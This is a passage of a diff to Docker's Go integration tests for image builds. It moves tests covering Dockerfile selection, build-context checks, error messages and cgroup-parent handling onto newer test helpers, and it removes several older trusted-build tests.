from files/dFile2", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", "test1", ".") - if err != nil { - c.Fatalf("Failed to build: %s\n%s", out, err) - } - if !strings.Contains(out, "from Dockerfile") { - c.Fatalf("test1 should have used Dockerfile, output:%s", out) - } - - out, _, err = dockerCmdInDir(c, ctx.Dir, "build", "-f", filepath.Join("files", "Dockerfile"), "-t", "test2", ".") - if err != nil { - c.Fatal(err) - } - if !strings.Contains(out, "from files/Dockerfile") { - c.Fatalf("test2 should have used files/Dockerfile, output:%s", out) - } - - out, _, err = dockerCmdInDir(c, ctx.Dir, "build", fmt.Sprintf("--file=%s", filepath.Join("files", "dFile")), "-t", "test3", ".") - if err != nil { - c.Fatal(err) - } - if !strings.Contains(out, "from files/dFile") { - c.Fatalf("test3 should have used files/dFile, output:%s", out) - } - - out, _, err = dockerCmdInDir(c, ctx.Dir, "build", "--file=dFile", "-t", "test4", ".") - if err != nil { - c.Fatal(err) - } - if !strings.Contains(out, "from dFile") { - c.Fatalf("test4 should have used dFile, output:%s", out) - } - - dirWithNoDockerfile, err := ioutil.TempDir(os.TempDir(), "test5") - c.Assert(err, check.IsNil) - nonDockerfileFile := filepath.Join(dirWithNoDockerfile, "notDockerfile") - if _, err = os.Create(nonDockerfileFile); err != nil { - c.Fatal(err) - } - out, _, err = dockerCmdInDir(c, ctx.Dir, "build", fmt.Sprintf("--file=%s", nonDockerfileFile), "-t", "test5", ".") - - if err == nil { - c.Fatalf("test5 was supposed to fail to find passwd") - } - - if expected := fmt.Sprintf("The Dockerfile (%s) must be within the build context (.)", nonDockerfileFile); !strings.Contains(out, expected) { - c.Fatalf("wrong error message:%v\nexpected to contain=%v", out, expected) - } - - out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", filepath.Join("..", "Dockerfile"), "-t", "test6", "..") - if err != nil { - c.Fatalf("test6 
failed: %s", err) - } - if !strings.Contains(out, "from Dockerfile") { - c.Fatalf("test6 should have used root Dockerfile, output:%s", out) - } - - out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", filepath.Join(ctx.Dir, "files", "Dockerfile"), "-t", "test7", "..") - if err != nil { - c.Fatalf("test7 failed: %s", err) - } - if !strings.Contains(out, "from files/Dockerfile") { - c.Fatalf("test7 should have used files Dockerfile, output:%s", out) - } - - out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", filepath.Join("..", "Dockerfile"), "-t", "test8", ".") - if err == nil || !strings.Contains(out, "must be within the build context") { - c.Fatalf("test8 should have failed with Dockerfile out of context: %s", err) - } - - tmpDir := os.TempDir() - out, _, err = dockerCmdInDir(c, tmpDir, "build", "-t", "test9", ctx.Dir) - if err != nil { - c.Fatalf("test9 - failed: %s", err) - } - if !strings.Contains(out, "from Dockerfile") { - c.Fatalf("test9 should have used root Dockerfile, output:%s", out) - } - - out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", "dFile2", "-t", "test10", ".") - if err != nil { - c.Fatalf("test10 should have worked: %s", err) - } - if !strings.Contains(out, "from files/dFile2") { - c.Fatalf("test10 should have used files/dFile2, output:%s", out) - } - -} - func (s *DockerSuite) TestBuildFromMixedcaseDockerfile(c *check.C) { testRequires(c, UnixCli) // Dockerfile overwrites dockerfile on windows testRequires(c, DaemonIsLinux) - ctx, err := fakeContext(`FROM busybox - RUN echo from dockerfile`, - map[string]string{ - "dockerfile": "FROM busybox\nRUN echo from dockerfile", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", "test1", ".") - if err != nil { - c.Fatalf("Failed to build: %s\n%s", out, err) - } - - if !strings.Contains(out, "from dockerfile") { - c.Fatalf("Missing proper output: 
%s", out) - } - -} - -func (s *DockerSuite) TestBuildWithTwoDockerfiles(c *check.C) { - testRequires(c, UnixCli) // Dockerfile overwrites dockerfile on windows - testRequires(c, DaemonIsLinux) - - ctx, err := fakeContext(`FROM busybox -RUN echo from Dockerfile`, - map[string]string{ - "dockerfile": "FROM busybox\nRUN echo from dockerfile", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", "test1", ".") - if err != nil { - c.Fatalf("Failed to build: %s\n%s", out, err) - } - - if !strings.Contains(out, "from Dockerfile") { - c.Fatalf("Missing proper output: %s", out) - } + // If Dockerfile is not present, use dockerfile + buildImage("test1", build.WithBuildContext(c, + build.WithFile("dockerfile", `FROM busybox + RUN echo from dockerfile`), + )).Assert(c, icmd.Expected{ + Out: "from dockerfile", + }) + // Prefer Dockerfile in place of dockerfile + buildImage("test1", build.WithBuildContext(c, + build.WithFile("dockerfile", `FROM busybox + RUN echo from dockerfile`), + build.WithFile("Dockerfile", `FROM busybox + RUN echo from Dockerfile`), + )).Assert(c, icmd.Expected{ + Out: "from Dockerfile", + }) } +// FIXME(vdemeester) should migrate to docker/cli tests func (s *DockerSuite) TestBuildFromURLWithF(c *check.C) { - server, err := fakeStorage(map[string]string{"baz": `FROM busybox + server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{"baz": `FROM busybox RUN echo from baz COPY * /tmp/ -RUN find /tmp/`}) - if err != nil { - c.Fatal(err) - } +RUN find /tmp/`})) defer server.Close() - ctx, err := fakeContext(`FROM busybox -RUN echo from Dockerfile`, - map[string]string{}) - if err != nil { - c.Fatal(err) - } + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(`FROM busybox + RUN echo from Dockerfile`)) defer ctx.Close() // Make sure that -f is ignored and that we don't use the Dockerfile // that's in the current dir - out, _, err := dockerCmdInDir(c, ctx.Dir, "build", 
"-f", "baz", "-t", "test1", server.URL()+"/baz") - if err != nil { - c.Fatalf("Failed to build: %s\n%s", out, err) - } + result := cli.BuildCmd(c, "test1", cli.WithFlags("-f", "baz", server.URL()+"/baz"), func(cmd *icmd.Cmd) func() { + cmd.Dir = ctx.Dir + return nil + }) - if !strings.Contains(out, "from baz") || - strings.Contains(out, "/tmp/baz") || - !strings.Contains(out, "/tmp/Dockerfile") { - c.Fatalf("Missing proper output: %s", out) + if !strings.Contains(result.Combined(), "from baz") || + strings.Contains(result.Combined(), "/tmp/baz") || + !strings.Contains(result.Combined(), "/tmp/Dockerfile") { + c.Fatalf("Missing proper output: %s", result.Combined()) } } +// FIXME(vdemeester) should migrate to docker/cli tests func (s *DockerSuite) TestBuildFromStdinWithF(c *check.C) { testRequires(c, DaemonIsLinux) // TODO Windows: This test is flaky; no idea why - ctx, err := fakeContext(`FROM busybox -RUN echo "from Dockerfile"`, - map[string]string{}) - if err != nil { - c.Fatal(err) - } + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(`FROM busybox +RUN echo "from Dockerfile"`)) defer ctx.Close() // Make sure that -f is ignored and that we don't use the Dockerfile // that's in the current dir - dockerCommand := exec.Command(dockerBinary, "build", "-f", "baz", "-t", "test1", "-") - dockerCommand.Dir = ctx.Dir - dockerCommand.Stdin = strings.NewReader(`FROM busybox + result := cli.BuildCmd(c, "test1", cli.WithFlags("-f", "baz", "-"), func(cmd *icmd.Cmd) func() { + cmd.Dir = ctx.Dir + cmd.Stdin = strings.NewReader(`FROM busybox RUN echo "from baz" COPY * /tmp/ RUN sh -c "find /tmp/" # sh -c is needed on Windows to use the correct find`) - out, status, err := runCommandWithOutput(dockerCommand) - if err != nil || status != 0 { - c.Fatalf("Error building: %s", err) - } + return nil + }) - if !strings.Contains(out, "from baz") || - strings.Contains(out, "/tmp/baz") || - !strings.Contains(out, "/tmp/Dockerfile") { - c.Fatalf("Missing proper output: %s", out) 
+ if !strings.Contains(result.Combined(), "from baz") || + strings.Contains(result.Combined(), "/tmp/baz") || + !strings.Contains(result.Combined(), "/tmp/Dockerfile") { + c.Fatalf("Missing proper output: %s", result.Combined()) } } @@ -5041,136 +3787,71 @@ func (s *DockerSuite) TestBuildFromOfficialNames(c *check.C) { } for idx, fromName := range fromNames { imgName := fmt.Sprintf("%s%d", name, idx) - _, err := buildImage(imgName, "FROM "+fromName, true) - if err != nil { - c.Errorf("Build failed using FROM %s: %s", fromName, err) - } - deleteImages(imgName) + buildImageSuccessfully(c, imgName, build.WithDockerfile("FROM "+fromName)) + dockerCmd(c, "rmi", imgName) } } -func (s *DockerSuite) TestBuildDockerfileOutsideContext(c *check.C) { - testRequires(c, UnixCli) // uses os.Symlink: not implemented in windows at the time of writing (go-1.4.2) - testRequires(c, DaemonIsLinux) +// FIXME(vdemeester) should be a unit test +func (s *DockerSuite) TestBuildSpaces(c *check.C) { + // Test to make sure that leading/trailing spaces on a command + // doesn't change the error msg we get + name := "testspaces" + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile("FROM busybox\nCOPY\n")) + defer ctx.Close() - name := "testbuilddockerfileoutsidecontext" - tmpdir, err := ioutil.TempDir("", name) - c.Assert(err, check.IsNil) - defer os.RemoveAll(tmpdir) - ctx := filepath.Join(tmpdir, "context") - if err := os.MkdirAll(ctx, 0755); err != nil { - c.Fatal(err) + result1 := cli.Docker(cli.Build(name), build.WithExternalBuildContext(ctx)) + result1.Assert(c, icmd.Expected{ + ExitCode: 1, + }) + + ctx.Add("Dockerfile", "FROM busybox\nCOPY ") + result2 := cli.Docker(cli.Build(name), build.WithExternalBuildContext(ctx)) + result2.Assert(c, icmd.Expected{ + ExitCode: 1, + }) + + removeLogTimestamps := func(s string) string { + return regexp.MustCompile(`time="(.*?)"`).ReplaceAllString(s, `time=[TIMESTAMP]`) } - if err := ioutil.WriteFile(filepath.Join(ctx, "Dockerfile"), []byte("FROM 
scratch\nENV X Y"), 0644); err != nil { - c.Fatal(err) - } - wd, err := os.Getwd() - if err != nil { - c.Fatal(err) - } - defer os.Chdir(wd) - if err := os.Chdir(ctx); err != nil { - c.Fatal(err) - } - if err := ioutil.WriteFile(filepath.Join(tmpdir, "outsideDockerfile"), []byte("FROM scratch\nENV x y"), 0644); err != nil { - c.Fatal(err) - } - if err := os.Symlink(filepath.Join("..", "outsideDockerfile"), filepath.Join(ctx, "dockerfile1")); err != nil { - c.Fatal(err) - } - if err := os.Symlink(filepath.Join(tmpdir, "outsideDockerfile"), filepath.Join(ctx, "dockerfile2")); err != nil { - c.Fatal(err) - } - - for _, dockerfilePath := range []string{ - filepath.Join("..", "outsideDockerfile"), - filepath.Join(ctx, "dockerfile1"), - filepath.Join(ctx, "dockerfile2"), - } { - result := dockerCmdWithResult("build", "-t", name, "--no-cache", "-f", dockerfilePath, ".") - c.Assert(result, icmd.Matches, icmd.Expected{ - Err: "must be within the build context", - ExitCode: 1, - }) - deleteImages(name) - } - - os.Chdir(tmpdir) - - // Path to Dockerfile should be resolved relative to working directory, not relative to context. - // There is a Dockerfile in the context, but since there is no Dockerfile in the current directory, the following should fail - out, _, err := dockerCmdWithError("build", "-t", name, "--no-cache", "-f", "Dockerfile", ctx) - if err == nil { - c.Fatalf("Expected error. 
Out: %s", out) - } -} - -func (s *DockerSuite) TestBuildSpaces(c *check.C) { - // Test to make sure that leading/trailing spaces on a command - // doesn't change the error msg we get - var ( - err1 error - err2 error - ) - - name := "testspaces" - ctx, err := fakeContext("FROM busybox\nCOPY\n", - map[string]string{ - "Dockerfile": "FROM busybox\nCOPY\n", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err1 = buildImageFromContext(name, ctx, false); err1 == nil { - c.Fatal("Build 1 was supposed to fail, but didn't") - } - - ctx.Add("Dockerfile", "FROM busybox\nCOPY ") - if _, err2 = buildImageFromContext(name, ctx, false); err2 == nil { - c.Fatal("Build 2 was supposed to fail, but didn't") - } - - removeLogTimestamps := func(s string) string { - return regexp.MustCompile(`time="(.*?)"`).ReplaceAllString(s, `time=[TIMESTAMP]`) - } - - // Skip over the times - e1 := removeLogTimestamps(err1.Error()) - e2 := removeLogTimestamps(err2.Error()) - - // Ignore whitespace since that's what were verifying doesn't change stuff - if strings.Replace(e1, " ", "", -1) != strings.Replace(e2, " ", "", -1) { - c.Fatalf("Build 2's error wasn't the same as build 1's\n1:%s\n2:%s", err1, err2) + + // Skip over the times + e1 := removeLogTimestamps(result1.Error.Error()) + e2 := removeLogTimestamps(result2.Error.Error()) + + // Ignore whitespace since that's what were verifying doesn't change stuff + if strings.Replace(e1, " ", "", -1) != strings.Replace(e2, " ", "", -1) { + c.Fatalf("Build 2's error wasn't the same as build 1's\n1:%s\n2:%s", result1.Error, result2.Error) } ctx.Add("Dockerfile", "FROM busybox\n COPY") - if _, err2 = buildImageFromContext(name, ctx, false); err2 == nil { - c.Fatal("Build 3 was supposed to fail, but didn't") - } + result2 = cli.Docker(cli.Build(name), build.WithoutCache, build.WithExternalBuildContext(ctx)) + result2.Assert(c, icmd.Expected{ + ExitCode: 1, + }) // Skip over the times - e1 = removeLogTimestamps(err1.Error()) - e2 = 
removeLogTimestamps(err2.Error()) + e1 = removeLogTimestamps(result1.Error.Error()) + e2 = removeLogTimestamps(result2.Error.Error()) // Ignore whitespace since that's what were verifying doesn't change stuff if strings.Replace(e1, " ", "", -1) != strings.Replace(e2, " ", "", -1) { - c.Fatalf("Build 3's error wasn't the same as build 1's\n1:%s\n3:%s", err1, err2) + c.Fatalf("Build 3's error wasn't the same as build 1's\n1:%s\n3:%s", result1.Error, result2.Error) } ctx.Add("Dockerfile", "FROM busybox\n COPY ") - if _, err2 = buildImageFromContext(name, ctx, false); err2 == nil { - c.Fatal("Build 4 was supposed to fail, but didn't") - } + result2 = cli.Docker(cli.Build(name), build.WithoutCache, build.WithExternalBuildContext(ctx)) + result2.Assert(c, icmd.Expected{ + ExitCode: 1, + }) // Skip over the times - e1 = removeLogTimestamps(err1.Error()) - e2 = removeLogTimestamps(err2.Error()) + e1 = removeLogTimestamps(result1.Error.Error()) + e2 = removeLogTimestamps(result2.Error.Error()) // Ignore whitespace since that's what were verifying doesn't change stuff if strings.Replace(e1, " ", "", -1) != strings.Replace(e2, " ", "", -1) { - c.Fatalf("Build 4's error wasn't the same as build 1's\n1:%s\n4:%s", err1, err2) + c.Fatalf("Build 4's error wasn't the same as build 1's\n1:%s\n4:%s", result1.Error, result2.Error) } } @@ -5183,39 +3864,31 @@ func (s *DockerSuite) TestBuildSpacesWithQuotes(c *check.C) { RUN echo " \ foo "` - _, out, err := buildImageWithOut(name, dockerfile, false) - if err != nil { - c.Fatal("Build failed:", err) - } - - expecting := "\n foo \n" + expected := "\n foo \n" // Windows uses the builtin echo, which preserves quotes - if daemonPlatform == "windows" { - expecting = "\" foo \"" - } - if !strings.Contains(out, expecting) { - c.Fatalf("Bad output: %q expecting to contain %q", out, expecting) + if testEnv.OSType == "windows" { + expected = "\" foo \"" } + buildImage(name, build.WithDockerfile(dockerfile)).Assert(c, icmd.Expected{ + Out: 
expected, + }) } // #4393 func (s *DockerSuite) TestBuildVolumeFileExistsinContainer(c *check.C) { testRequires(c, DaemonIsLinux) // TODO Windows: This should error out - buildCmd := exec.Command(dockerBinary, "build", "-t", "docker-test-errcreatevolumewithfile", "-") - buildCmd.Stdin = strings.NewReader(` + buildImage("docker-test-errcreatevolumewithfile", build.WithDockerfile(` FROM busybox RUN touch /foo VOLUME /foo - `) - - out, _, err := runCommandWithOutput(buildCmd) - if err == nil || !strings.Contains(out, "file exists") { - c.Fatalf("expected build to fail when file exists in container at requested volume path") - } - + `)).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "file exists", + }) } +// FIXME(vdemeester) should be a unit test func (s *DockerSuite) TestBuildMissingArgs(c *check.C) { // Test to make sure that all Dockerfile commands (except the ones listed // in skipCmds) will generate an error if no args are provided. @@ -5227,7 +3900,7 @@ func (s *DockerSuite) TestBuildMissingArgs(c *check.C) { "INSERT": {}, } - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { skipCmds = map[string]struct{}{ "CMD": {}, "RUN": {}, @@ -5245,7 +3918,6 @@ func (s *DockerSuite) TestBuildMissingArgs(c *check.C) { if _, ok := skipCmds[cmd]; ok { continue } - var dockerfile string if cmd == "FROM" { dockerfile = cmd @@ -5254,148 +3926,104 @@ func (s *DockerSuite) TestBuildMissingArgs(c *check.C) { dockerfile = "FROM busybox\n" + cmd } - ctx, err := fakeContext(dockerfile, map[string]string{}) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - var out string - if out, err = buildImageFromContext("args", ctx, true); err == nil { - c.Fatalf("%s was supposed to fail. 
Out:%s", cmd, out) - } - if !strings.Contains(err.Error(), cmd+" requires") { - c.Fatalf("%s returned the wrong type of error:%s", cmd, err) - } + buildImage("args", build.WithDockerfile(dockerfile)).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: cmd + " requires", + }) } } func (s *DockerSuite) TestBuildEmptyScratch(c *check.C) { testRequires(c, DaemonIsLinux) - _, out, err := buildImageWithOut("sc", "FROM scratch", true) - if err == nil { - c.Fatalf("Build was supposed to fail") - } - if !strings.Contains(out, "No image was generated") { - c.Fatalf("Wrong error message: %v", out) - } + buildImage("sc", build.WithDockerfile("FROM scratch")).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "No image was generated", + }) } func (s *DockerSuite) TestBuildDotDotFile(c *check.C) { - ctx, err := fakeContext("FROM busybox\n", - map[string]string{ - "..gitme": "", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err = buildImageFromContext("sc", ctx, false); err != nil { - c.Fatalf("Build was supposed to work: %s", err) - } + buildImageSuccessfully(c, "sc", build.WithBuildContext(c, + build.WithFile("Dockerfile", "FROM busybox\n"), + build.WithFile("..gitme", ""), + )) } func (s *DockerSuite) TestBuildRUNoneJSON(c *check.C) { testRequires(c, DaemonIsLinux) // No hello-world Windows image name := "testbuildrunonejson" - ctx, err := fakeContext(`FROM hello-world:frozen -RUN [ "/hello" ]`, map[string]string{}) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "--no-cache", "-t", name, ".") - if err != nil { - c.Fatalf("failed to build the image: %s, %v", out, err) - } - - if !strings.Contains(out, "Hello from Docker") { - c.Fatalf("bad output: %s", out) - } - + buildImage(name, build.WithDockerfile(`FROM hello-world:frozen +RUN [ "/hello" ]`)).Assert(c, icmd.Expected{ + Out: "Hello from Docker", + }) } func (s *DockerSuite) TestBuildEmptyStringVolume(c *check.C) { name := 
"testbuildemptystringvolume" - _, err := buildImage(name, ` + buildImage(name, build.WithDockerfile(` FROM busybox ENV foo="" VOLUME $foo - `, false) - if err == nil { - c.Fatal("Should have failed to build") - } - + `)).Assert(c, icmd.Expected{ + ExitCode: 1, + }) } func (s *DockerSuite) TestBuildContainerWithCgroupParent(c *check.C) { - testRequires(c, SameHostDaemon) - testRequires(c, DaemonIsLinux) + testRequires(c, SameHostDaemon, DaemonIsLinux) cgroupParent := "test" data, err := ioutil.ReadFile("/proc/self/cgroup") if err != nil { c.Fatalf("failed to read '/proc/self/cgroup - %v", err) } - selfCgroupPaths := parseCgroupPaths(string(data)) + selfCgroupPaths := ParseCgroupPaths(string(data)) _, found := selfCgroupPaths["memory"] if !found { c.Fatalf("unable to find self memory cgroup path. CgroupsPath: %v", selfCgroupPaths) } - cmd := exec.Command(dockerBinary, "build", "--cgroup-parent", cgroupParent, "-") - cmd.Stdin = strings.NewReader(` + result := buildImage("buildcgroupparent", + cli.WithFlags("--cgroup-parent", cgroupParent), + build.WithDockerfile(` FROM busybox RUN cat /proc/self/cgroup -`) - - out, _, err := runCommandWithOutput(cmd) - if err != nil { - c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err) - } - m, err := regexp.MatchString(fmt.Sprintf("memory:.*/%s/.*", cgroupParent), out) +`)) + result.Assert(c, icmd.Success) + m, err := regexp.MatchString(fmt.Sprintf("memory:.*/%s/.*", cgroupParent), result.Combined()) c.Assert(err, check.IsNil) if !m { - c.Fatalf("There is no expected memory cgroup with parent /%s/: %s", cgroupParent, out) + c.Fatalf("There is no expected memory cgroup with parent /%s/: %s", cgroupParent, result.Combined()) } } +// FIXME(vdemeester) could be a unit test func (s *DockerSuite) TestBuildNoDupOutput(c *check.C) { // Check to make sure our build output prints the Dockerfile cmd // property - there was a bug that caused it to be duplicated on the // Step X line 
name := "testbuildnodupoutput" - - _, out, err := buildImageWithOut(name, ` + result := buildImage(name, build.WithDockerfile(` FROM busybox - RUN env`, false) - if err != nil { - c.Fatalf("Build should have worked: %q", err) - } - + RUN env`)) + result.Assert(c, icmd.Success) exp := "\nStep 2/2 : RUN env\n" - if !strings.Contains(out, exp) { - c.Fatalf("Bad output\nGot:%s\n\nExpected to contain:%s\n", out, exp) + if !strings.Contains(result.Combined(), exp) { + c.Fatalf("Bad output\nGot:%s\n\nExpected to contain:%s\n", result.Combined(), exp) } } // GH15826 +// FIXME(vdemeester) could be a unit test func (s *DockerSuite) TestBuildStartsFromOne(c *check.C) { // Explicit check to ensure that build starts from step 1 rather than 0 name := "testbuildstartsfromone" - - _, out, err := buildImageWithOut(name, ` - FROM busybox`, false) - if err != nil { - c.Fatalf("Build should have worked: %q", err) - } - + result := buildImage(name, build.WithDockerfile(`FROM busybox`)) + result.Assert(c, icmd.Success) exp := "\nStep 1/1 : FROM busybox\n" - if !strings.Contains(out, exp) { - c.Fatalf("Bad output\nGot:%s\n\nExpected to contain:%s\n", out, exp) + if !strings.Contains(result.Combined(), exp) { + c.Fatalf("Bad output\nGot:%s\n\nExpected to contain:%s\n", result.Combined(), exp) } } @@ -5403,228 +4031,49 @@ func (s *DockerSuite) TestBuildRUNErrMsg(c *check.C) { // Test to make sure the bad command is quoted with just "s and // not as a Go []string name := "testbuildbadrunerrmsg" - _, out, err := buildImageWithOut(name, ` - FROM busybox - RUN badEXE a1 \& a2 a3`, false) // tab between a2 and a3 - if err == nil { - c.Fatal("Should have failed to build") - } shell := "/bin/sh -c" - exitCode := "127" - if daemonPlatform == "windows" { + exitCode := 127 + if testEnv.OSType == "windows" { shell = "cmd /S /C" // architectural - Windows has to start the container to determine the exe is bad, Linux does not - exitCode = "1" - } - exp := `The command '` + shell + ` badEXE a1 \& a2 a3' 
returned a non-zero code: ` + exitCode - if !strings.Contains(out, exp) { - c.Fatalf("RUN doesn't have the correct output:\nGot:%s\nExpected:%s", out, exp) - } -} - -func (s *DockerTrustSuite) TestTrustedBuild(c *check.C) { - repoName := s.setupTrustedImage(c, "trusted-build") - dockerFile := fmt.Sprintf(` - FROM %s - RUN [] - `, repoName) - - name := "testtrustedbuild" - - buildCmd := buildImageCmd(name, dockerFile, true) - s.trustedCmd(buildCmd) - out, _, err := runCommandWithOutput(buildCmd) - if err != nil { - c.Fatalf("Error running trusted build: %s\n%s", err, out) - } - - if !strings.Contains(out, fmt.Sprintf("FROM %s@sha", repoName[:len(repoName)-7])) { - c.Fatalf("Unexpected output on trusted build:\n%s", out) - } - - // We should also have a tag reference for the image. - if out, exitCode := dockerCmd(c, "inspect", repoName); exitCode != 0 { - c.Fatalf("unexpected exit code inspecting image %q: %d: %s", repoName, exitCode, out) - } - - // We should now be able to remove the tag reference. 
- if out, exitCode := dockerCmd(c, "rmi", repoName); exitCode != 0 { - c.Fatalf("unexpected exit code inspecting image %q: %d: %s", repoName, exitCode, out) - } -} - -func (s *DockerTrustSuite) TestTrustedBuildUntrustedTag(c *check.C) { - repoName := fmt.Sprintf("%v/dockercli/build-untrusted-tag:latest", privateRegistryURL) - dockerFile := fmt.Sprintf(` - FROM %s - RUN [] - `, repoName) - - name := "testtrustedbuilduntrustedtag" - - buildCmd := buildImageCmd(name, dockerFile, true) - s.trustedCmd(buildCmd) - out, _, err := runCommandWithOutput(buildCmd) - if err == nil { - c.Fatalf("Expected error on trusted build with untrusted tag: %s\n%s", err, out) + exitCode = 1 } + exp := fmt.Sprintf(`The command '%s badEXE a1 \& a2 a3' returned a non-zero code: %d`, shell, exitCode) - if !strings.Contains(out, "does not have trust data for") { - c.Fatalf("Unexpected output on trusted build with untrusted tag:\n%s", out) - } -} - -func (s *DockerTrustSuite) TestBuildContextDirIsSymlink(c *check.C) { - testRequires(c, DaemonIsLinux) - tempDir, err := ioutil.TempDir("", "test-build-dir-is-symlink-") - c.Assert(err, check.IsNil) - defer os.RemoveAll(tempDir) - - // Make a real context directory in this temp directory with a simple - // Dockerfile. - realContextDirname := filepath.Join(tempDir, "context") - if err := os.Mkdir(realContextDirname, os.FileMode(0755)); err != nil { - c.Fatal(err) - } - - if err = ioutil.WriteFile( - filepath.Join(realContextDirname, "Dockerfile"), - []byte(` - FROM busybox - RUN echo hello world - `), - os.FileMode(0644), - ); err != nil { - c.Fatal(err) - } - - // Make a symlink to the real context directory. - contextSymlinkName := filepath.Join(tempDir, "context_link") - if err := os.Symlink(realContextDirname, contextSymlinkName); err != nil { - c.Fatal(err) - } - - // Executing the build with the symlink as the specified context should - // *not* fail. 
- if out, exitStatus := dockerCmd(c, "build", contextSymlinkName); exitStatus != 0 { - c.Fatalf("build failed with exit status %d: %s", exitStatus, out) - } -} - -func (s *DockerTrustSuite) TestTrustedBuildTagFromReleasesRole(c *check.C) { - testRequires(c, NotaryHosting) - - latestTag := s.setupTrustedImage(c, "trusted-build-releases-role") - repoName := strings.TrimSuffix(latestTag, ":latest") - - // Now create the releases role - s.notaryCreateDelegation(c, repoName, "targets/releases", s.not.keys[0].Public) - s.notaryImportKey(c, repoName, "targets/releases", s.not.keys[0].Private) - s.notaryPublish(c, repoName) - - // push a different tag to the releases role - otherTag := fmt.Sprintf("%s:other", repoName) - dockerCmd(c, "tag", "busybox", otherTag) - - pushCmd := exec.Command(dockerBinary, "push", otherTag) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("Trusted push failed: %s", out)) - s.assertTargetInRoles(c, repoName, "other", "targets/releases") - s.assertTargetNotInRoles(c, repoName, "other", "targets") - - out, status := dockerCmd(c, "rmi", otherTag) - c.Assert(status, check.Equals, 0, check.Commentf("docker rmi failed: %s", out)) - - dockerFile := fmt.Sprintf(` - FROM %s - RUN [] - `, otherTag) - - name := "testtrustedbuildreleasesrole" - - buildCmd := buildImageCmd(name, dockerFile, true) - s.trustedCmd(buildCmd) - out, _, err = runCommandWithOutput(buildCmd) - c.Assert(err, check.IsNil, check.Commentf("Trusted build failed: %s", out)) - c.Assert(out, checker.Contains, fmt.Sprintf("FROM %s@sha", repoName)) -} - -func (s *DockerTrustSuite) TestTrustedBuildTagIgnoresOtherDelegationRoles(c *check.C) { - testRequires(c, NotaryHosting) - - latestTag := s.setupTrustedImage(c, "trusted-build-releases-role") - repoName := strings.TrimSuffix(latestTag, ":latest") - - // Now create a non-releases delegation role - s.notaryCreateDelegation(c, repoName, "targets/other", s.not.keys[0].Public) - 
s.notaryImportKey(c, repoName, "targets/other", s.not.keys[0].Private) - s.notaryPublish(c, repoName) - - // push a different tag to the other role - otherTag := fmt.Sprintf("%s:other", repoName) - dockerCmd(c, "tag", "busybox", otherTag) - - pushCmd := exec.Command(dockerBinary, "push", otherTag) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("Trusted push failed: %s", out)) - s.assertTargetInRoles(c, repoName, "other", "targets/other") - s.assertTargetNotInRoles(c, repoName, "other", "targets") - - out, status := dockerCmd(c, "rmi", otherTag) - c.Assert(status, check.Equals, 0, check.Commentf("docker rmi failed: %s", out)) - - dockerFile := fmt.Sprintf(` - FROM %s - RUN [] - `, otherTag) - - name := "testtrustedbuildotherrole" - - buildCmd := buildImageCmd(name, dockerFile, true) - s.trustedCmd(buildCmd) - out, _, err = runCommandWithOutput(buildCmd) - c.Assert(err, check.NotNil, check.Commentf("Trusted build expected to fail: %s", out)) + buildImage(name, build.WithDockerfile(` + FROM busybox + RUN badEXE a1 \& a2 a3`)).Assert(c, icmd.Expected{ + ExitCode: exitCode, + Err: exp, + }) } // Issue #15634: COPY fails when path starts with "null" func (s *DockerSuite) TestBuildNullStringInAddCopyVolume(c *check.C) { name := "testbuildnullstringinaddcopyvolume" - volName := "nullvolume" - - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { volName = `C:\\nullvolume` } - ctx, err := fakeContext(` + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", ` FROM busybox ADD null / COPY nullfile / VOLUME `+volName+` - `, - map[string]string{ - "null": "test1", - "nullfile": "test2", - }, - ) - c.Assert(err, check.IsNil) - defer ctx.Close() - - _, err = buildImageFromContext(name, ctx, true) - c.Assert(err, check.IsNil) + `), + build.WithFile("null", "test1"), + build.WithFile("nullfile", "test2"), + )) } func (s *DockerSuite) TestBuildStopSignal(c 
